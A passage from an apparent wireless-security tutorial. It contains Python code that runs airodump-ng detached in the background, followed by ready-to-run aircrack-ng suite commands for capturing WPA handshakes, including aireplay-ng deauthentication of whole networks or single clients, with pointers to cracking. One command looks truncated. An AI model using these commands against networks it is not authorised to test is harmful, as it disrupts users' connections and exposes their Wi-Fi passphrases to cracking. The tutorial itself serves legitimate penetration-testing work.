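    No controlling terminal means no SIGHUP when the SSH session drops, and a
    discarded stdout means there is no nohup.out to clean up with cron."""
    proc = subprocess.Popen(
        cmd,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        start_new_session=True,   # setsid(): new session, no controlling tty
    )
    if pidfile is not None:
        with open(pidfile, "w") as fh:  # assumed location, e.g. /tmp/airodump.pid
            fh.write("%d\n" % proc.pid)
    return proc


def own_session(proc):
    """True if the child is a session leader, i.e. detached from our terminal."""
    return os.getsid(proc.pid) == proc.pid


def stop(proc, grace=5.0):
    """SIGTERM first so airodump-ng flushes and closes its .cap/.csv files; SIGKILL as last resort.

    Returns the exit status (negative = terminated by that signal number)."""
    if proc.poll() is not None:
        return proc.returncode
    proc.terminate()
    try:
        proc.wait(timeout=grace)
    except subprocess.TimeoutExpired:
        proc.kill()
        proc.wait()
    return proc.returncode


if __name__ == "__main__":
    # Example run (assumes a monitor-mode interface named wlan0mon and root privileges).
    cmd = build_airodump_cmd("wlan0mon", "capture", channel=7, write_interval=30)
    proc = launch_detached(cmd, pidfile="/tmp/airodump.pid")
    print("started pid %d, own session: %s" % (proc.pid, own_session(proc)))
```

The pid in the pidfile is what you later hand back to stop() (or kill -TERM from the shell); asking airodump-ng for pcap,csv output only keeps the directory free of the kismet and netxml files nobody reads.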

Other useful commands for capturing the WPA handshake:
– Capture traffic of a specific BSSID (router/AP):

airodump-ng -c 7 --bssid 12:34:56:78:90:AB -w capture wlan0

//replace 7 with your channel and modify the MAC

– Deauthenticate all sessions of a WLAN with aireplay:

aireplay-ng -0 1 -a 12:34:56:78:90:AB wlan0

– Deauthenticate a client:

aireplay-ng -0 1 -a router_MAC -c client_MAC wlan1

– View hidden ESSID:

airodump-ng --essid-regex "<len " wlan1

Cracking the WPA handshake is a different subject, but it can be done with aircrack-ng or hashcat (formerly oclHashcat, for GPUs with OpenCL or CUDA).

More info:

Please make sure that you only try this tutorial on WLANs or equipment that you own or have permission to test. Ignoring this advice will get you into legal trouble.